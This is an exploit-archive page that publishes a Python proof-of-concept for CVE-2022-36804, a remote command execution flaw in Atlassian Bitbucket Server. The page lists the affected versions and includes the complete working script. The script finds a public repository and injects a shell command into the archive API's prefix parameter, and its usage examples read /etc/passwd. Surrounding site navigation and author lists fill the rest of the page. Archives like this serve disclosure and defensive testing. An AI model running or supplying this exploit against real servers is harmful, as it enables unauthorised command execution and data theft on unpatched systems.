Bitbucket 7.0.0 Remote Command Execution

Bitbucket 7.0.0 Remote Command Execution: Posted Mar 24, 2023; Authored by khal4n1; Bitbucket version 7.0.0 suffers from a remote command execution vulnerability.; tags | exploit, remote; advisories | CVE-2022-36804; SHA-256 | abac6940dc4a2ee511a0471c9fd076aab1d296308b184e71e03da3ce0d1cc8f9; Download | Favorite | View

Bitbucket 7.0.0 Remote Command Execution

# Exploit Title: Bitbucket v7.0.0 -  RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804

#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1

#Usage Example

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'

# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'

#The server will send a 500 http response with the stout output from the
# command  executed.


#****************************************************************#

#!/usr/bin/python3

import argparse
import urllib
from urllib import request
import re

#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)


#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()

#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

# Exploitation
try :
        attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
        print (attack.response())
except urllib.error.HTTPError as e:
        body = e.read().decode()  # Read the body of the error response
        print (body)

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Bitbucket 7.0.0 Remote Command Execution

Bitbucket 7.0.0 Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Bitbucket 7.0.0 Remote Command Execution

Share This

Bitbucket 7.0.0 Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems